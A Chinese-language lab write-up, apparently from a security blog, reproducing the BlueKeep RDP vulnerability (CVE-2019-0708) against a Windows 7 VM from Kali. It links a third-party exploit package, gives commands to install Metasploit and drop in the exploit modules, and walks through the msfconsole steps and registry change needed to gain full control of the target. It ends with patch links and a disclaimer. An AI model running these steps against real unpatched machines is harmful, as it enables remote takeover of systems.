一、背景概述
2019年5月14日,微軟釋出更新檔修複了一個遠端桌面服務的高危漏洞(CVE-2019-0708),該漏洞影響部分的Windows作業系統。當未經身份驗證的攻擊者使用遠端桌面連接配接到目标系統并發送請求時,可以再目标系統上執行任意代碼。系漏洞是預身份驗證,無需使用者互動。
二、影響範圍
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows Server 2003(已停止維護)
Windows XP(已停止維護)
三、環境
攻擊機:Kali Linux IP:192.168.126.130
靶機:Windows 7 IP:192.168.126.131
虛拟機:VMware Workstation 15 Pro
工具:msf5
POC:https://github.com/backlion/demo/raw/master/CVE-2019-0708_RDP%20_MSF.zip
四、工具準備
1.使用如下指令安裝msf
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
2.下載下傳POC進行替換(msf更新或安裝後檔案替換路徑)
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
五、漏洞複現
打開Kali Linux的終端,輸入msfconsole啟動metasploit-framework
使用search cve_2019_0708搜尋相關子產品
使use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 來啟用攻擊子產品
使用info檢視資訊
可以看出需要主要設定的為:RHOSTS、RPORT、target
使用set RHOSTS 192.168.126.131 設定靶機IP
使用set RPORT 3389 設定靶機端口
使用set target {1~3}設定靶機架構
使用exploit發起攻擊,等待建立會話
完成攻擊拿到靶機權限
利用公開的msf攻擊代碼,設定目标位址。直接能取得目标主機的最高控制權.
目前公開的代買可用于攻擊Windows 7 SP1 x64 于Windows Server 2008 R2 x64,該EXP并不穩定,針對Windows 7 SP1 x64攻擊有可能導緻機器藍屏,并且Windows Server 2008 R2 x64 需要修改
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TerminalServer\WinStations\rdpwd\fDisableCam]
的值為0才能成功
六、漏洞修複
微軟官方更新檔下載下傳:https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
奇安信CVE-2019-0708漏洞檢測修複工具:https://www.qianxin.com/other/CVE-2019-0708
七、免責聲明
本文内容涉及程式/技術原理(包括源代碼、軟體的使用)可能帶有攻擊性,僅用于安全研究和教學使用,務必在模拟環境下進行實驗,請勿将其用于其他用途。
是以造成的後果自行承擔,如有違反國家法律則自行承擔全部法律責任,于NowsSec及分享者無關。
八、參考連接配接
- https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
- @rapid7 Add initial exploit for CVE-2019-0708, BlueKeep #12283
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1181
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1182